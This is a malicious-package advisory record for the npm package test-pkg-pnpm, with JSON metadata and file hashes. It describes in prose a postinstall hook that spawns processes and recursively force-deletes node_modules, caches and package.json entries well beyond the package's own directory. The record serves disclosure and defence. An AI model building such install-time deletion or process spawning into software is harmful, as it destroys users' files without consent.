mal-2026-6716
Vulnerability from ossf_malicious_packages
Published
2026-07-01 20:47
Modified
2026-07-01 21:06
Summary
Malicious code in test-pkg-pnpm (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ae5df84cbdf3092d5f7b8f405248144eacdf5119c756c97726974e547810ebec)

On npm install, the package's postinstall script (node demo-clean.js) auto-executes two installer-side actions without consent. First, openDemo() platform-branches via execSync to open https://github.com/X3r0Day/BunnyHijack in the installer's default browser and to spawn the OS calculator (calc on Windows, open -a Calculator on macOS, gnome-calculator/kcalc on Linux) — the canonical calc.exe proof of unauthenticated code execution on the installer's host. Second, cleanup() walks every ancestor directory of INIT_CWD, process.cwd(), and the user's home directory, calling fs.rmSync(..., {recursive:true, force:true}) against paths inside each ancestor's node_modules, node_modules/.pnpm, node_modules/.bin/node* shims, ~/.npm/_npx, ~/.bun/install/cache, and tmpdir entries; cleanupPackageJson() then reads each ancestor package.json and rewrites it via fs.writeFileSync after deleting matching entries from dependencies, devDependencies, optionalDependencies, and peerDependencies. The destructive recursive-force-rm operates well outside the package's own directory and reaches the user's home tree, and the spawned-process primitive can be retargeted to any binary in a future release.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "package.json",
              "sha256": "8f7a41070899d5ceb3cd3a6efd35364f45943b1b41a0f8a01010993f897e48d1",
              "tlsh": "1ed02b448861467324cd38615d399403a7380b4780153c2c62d71099aa497bb04b9265"
            },
            {
              "path": "shim.js",
              "sha256": "e4ae6c862f2fcf3c6440c966cd74bd9f07a06be072bd301df27ae0848aa50adb",
              "tlsh": "3331726796a197f42de04dc2a487482174abc723b205ffb881ced1536b8a41702fb4f9"
            }
          ],
          "package_integrity": [
            {
              "filename": "test-pkg-pnpm-1.0.1.tgz",
              "hashes": {
                "sha1": "b399121b46ab19bca631a7c8234653a187e9a343",
                "sha512_sri": "sha512-Jki+8yoVYBSIpTuE83uAVs1P1+sB7zGchYs0/a6Ehyc2FFIBXxtxeRKEMgN/paXXit0sHpH3rMCizPaOluUlgw=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "test-pkg-pnpm"
      },
      "versions": [
        "1.0.1",
        "1.0.4"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007894",
        "import_time": "2026-07-01T21:04:20.562853387Z",
        "modified_time": "2026-07-01T20:47:27Z",
        "sha256": "8ee6a2ba8d90a67199eae146b7688190adb974ce5aa1be7c07d56e2e3999d270",
        "source": "amazon-inspector",
        "versions": [
          "1.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-007893",
        "import_time": "2026-07-01T21:04:20.500515222Z",
        "modified_time": "2026-07-01T20:47:19Z",
        "sha256": "ae5df84cbdf3092d5f7b8f405248144eacdf5119c756c97726974e547810ebec",
        "source": "amazon-inspector",
        "versions": [
          "1.0.4"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ae5df84cbdf3092d5f7b8f405248144eacdf5119c756c97726974e547810ebec)\nOn `npm install`, the package\u0027s `postinstall` script (`node demo-clean.js`) auto-executes two installer-side actions without consent. First, `openDemo()` platform-branches via `execSync` to open https://github.com/X3r0Day/BunnyHijack in the installer\u0027s default browser and to spawn the OS calculator (`calc` on Windows, `open -a Calculator` on macOS, `gnome-calculator`/`kcalc` on Linux) \u2014 the canonical `calc.exe` proof of unauthenticated code execution on the installer\u0027s host. Second, `cleanup()` walks every ancestor directory of `INIT_CWD`, `process.cwd()`, and the user\u0027s home directory, calling `fs.rmSync(..., {recursive:true, force:true})` against paths inside each ancestor\u0027s `node_modules`, `node_modules/.pnpm`, `node_modules/.bin/node*` shims, `~/.npm/_npx`, `~/.bun/install/cache`, and tmpdir entries; `cleanupPackageJson()` then reads each ancestor `package.json` and rewrites it via `fs.writeFileSync` after deleting matching entries from `dependencies`, `devDependencies`, `optionalDependencies`, and `peerDependencies`. The destructive recursive-force-rm operates well outside the package\u0027s own directory and reaches the user\u0027s home tree, and the spawned-process primitive can be retargeted to any binary in a future release.\n",
  "id": "MAL-2026-6716",
  "modified": "2026-07-01T21:06:12Z",
  "published": "2026-07-01T20:47:19Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/test-pkg-pnpm/v/1.0.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/test-pkg-pnpm/v/1.0.4"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in test-pkg-pnpm (npm)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…